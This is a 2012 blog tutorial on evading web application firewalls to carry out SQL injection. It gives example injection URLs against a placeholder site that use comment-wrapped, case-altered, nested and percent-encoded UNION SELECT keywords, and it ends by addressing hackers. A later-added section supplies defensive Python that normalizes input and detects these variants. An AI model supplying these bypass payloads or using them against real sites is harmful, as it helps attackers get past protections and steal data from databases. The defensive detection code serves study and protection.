Tuesday, November 6, 2012

Basic WAF Bypassing Methods





Today I am going to show you how to bypass Web Application Firewalls (WAF). I will demonstrate the simplest and most basic techniques!

 


NOTE: SQL Injection is not demonstrated here! If you don’t know SQL Injection, read this first… 


What is a WAF?


WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend against SQL Injections!


How to know if there is a Web Application Firewall?


This is pretty simple! When you try to enter a command used for SQL Injections (usually the “UNION SELECT” command), you get a 403 Error (and the website says “Forbidden” or “Not Acceptable”).


Example:


http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4….

(Error!)


Basic/Simple Methods:


First, of course, we need to know the basic methods to bypass a WAF…


1) Comments:


You can use comments to bypass WAF:


http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4….

(First method that can bypass a WAF)


However, most WAFs identify this method, so they still show a “Forbidden” error…


2) Change the Case of the Letters:


You can also change the case of the command:

http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….

(Another basic method to bypass a WAF!)

However, as before, this trick is also detected by most WAFs!


3) Combine the previous Methods:


What you can also do is to combine the previous two methods:

http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4….

This method is not detectable by many Web Application Firewalls!


4) Replaced Keywords:


Some firewalls remove the “UNION SELECT” statement when it is found in the URL… We can take advantage of this behaviour:

 

http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….

(The inner “union” and “select” will be removed, so the final result will be: “UNION SELECT”)

This method doesn’t work on ALL firewalls, as only some of them remove the “UNION” and the “SELECT” commands when they are detected!


5) Inline Comments:


Some firewalls get bypassed by inserting inline comments between the “Union” and the “Select” commands:

 

http://www.site.com/index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4…

(The %55 is equal to “U” and %53 to “S”)
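As an added example (not part of the original post), the following Python looks at the five methods above from the WAF's side: a literal `UNION SELECT` signature on the raw value misses every variant except the plain one, while a rule that normalizes the value first (percent-decoding until stable, unwrapping `/*! ... */` comments, folding case and whitespace) catches them. It also models the strip-the-keyword sanitizer that method 4 relies on, with a single pass beside a version that strips until nothing changes. The `SAMPLES` values are constructed from the URLs in the post.

```python
import re
from urllib.parse import unquote

# Constructed page_id values covering the five evasion forms from the post,
# plus one benign value. None of these is a real request.
SAMPLES = {
    "plain":    "-15 UNION SELECT 1,2,3,4",
    "comments": "-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4",
    "case":     "-15 uNIoN sELecT 1,2,3,4",
    "combined": "-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4",
    "replaced": "-15 UNIunionON SELselectECT 1,2,3,4",
    "inline":   "-15 %55nION/**/%53ElecT 1,2,3,4",
    "benign":   "15",
}

# A simplistic WAF rule: a literal, case-sensitive signature on the raw value.
NAIVE_RULE = re.compile(r"UNION SELECT")

def naive_match(value: str) -> bool:
    return NAIVE_RULE.search(value) is not None

def normalize(value: str) -> str:
    """Canonicalise the value before matching: decode, unwrap comments, fold case."""
    prev = None
    while prev != value:              # decode until stable (guards double-encoding)
        prev, value = value, unquote(value)
    # MySQL executes the body of /*!...*/ as SQL, so keep it; /**/ becomes a space
    value = re.sub(r"/\*!?(.*?)\*/", r" \1 ", value, flags=re.S)
    return " ".join(value.lower().split())

def normalized_match(value: str) -> bool:
    return re.search(r"\bunion\s+select\b", normalize(value)) is not None

def strip_keywords(value: str, until_stable: bool = False) -> str:
    """Model of a 'remove the keyword' sanitizer. A single pass is what method 4
    relies on: removing the inner 'union'/'select' leaves 'UNION SELECT' behind."""
    while True:
        before = value
        for kw in ("union", "select"):
            value = re.sub(kw, "", value, flags=re.I)
        if not until_stable or value == before:
            return value

if __name__ == "__main__":
    for name, v in SAMPLES.items():
        print(f"{name:9} naive={naive_match(v)!s:5} normalized={normalized_match(v)}")
    print("strip once  :", strip_keywords(SAMPLES["replaced"]))
    print("strip stable:", strip_keywords(SAMPLES["replaced"], until_stable=True))
```

The "replaced" sample shows why rejecting a request is safer than rewriting it: the value is harmless until a one-pass sanitizer turns it into `UNION SELECT`.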

 

I hope this post is very useful to all the hackers.


